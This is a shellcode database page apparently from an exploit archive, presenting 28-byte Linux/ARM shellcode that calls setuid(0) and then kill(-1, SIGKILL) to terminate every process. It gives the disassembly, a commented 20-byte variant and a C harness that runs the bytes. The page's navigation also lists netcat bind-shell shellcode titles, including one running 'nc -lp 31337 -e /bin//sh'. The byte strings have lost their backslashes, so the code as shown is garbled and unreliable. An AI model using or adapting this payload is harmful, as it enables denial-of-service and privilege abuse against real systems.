[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes
# Published : 2010-06-29
# Author :
# Previous Title : Linux/x86 - netcat bindshell port 6666 - 69 bytes
# Next Title : 91 bytes nc -lp 31337 -e /bin//sh polymorphic linux shellcode .


/*
Title:  Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes
	(Kill all processes)

Date:   2010-06-29
Tested: ARM926EJ-S rev 5 (v5l)

Author: Jonathan Salwan
Web:    http://shell-storm.org | http://twitter.com/jonathansalwan

! Dtabase of shellcodes http://www.shell-storm.org/shellcode/


    8054:	e28f3001 	add	r3, pc, #1   ; 0x1
    8058:	e12fff13 	bx	r3
    805c:	1b24      	subs	r4, r4, r4
    805e:	1c20      	adds	r0, r4, #0
    8060:	2717      	movs	r7, #23
    8062:	df01      	svc	1
    8064:	1a92      	subs	r2, r2, r2
    8066:	1c10      	adds	r0, r2, #0
    8068:	3801      	subs	r0, #1
    806a:	2109      	movs	r1, #9
    806c:	2725      	movs	r7, #37
    806e:	df01      	svc	1

*/

#include <stdio.h>


/* kill all processes without setuid(0) - 20 bytes */

// char *SC = "x01x30x8fxe2"
//            "x13xffx2fxe1"
//            "x92x1ax10x1c"
//            "x01x38x09x21"
//            "x25x27x01xdf";


/* kill all processes with setuid(0) - 28 byes */ 

char *SC = "x01x30x8fxe2"
           "x13xffx2fxe1"
           "x24x1bx20x1c"
           "x17x27x01xdf"
           "x92x1ax10x1c"
           "x01x38x09x21"
           "x25x27x01xdf";


int main(void)
{
        fprintf(stdout,"Length: %dn",strlen(SC));
        (*(void(*)()) SC)();
return 0;
}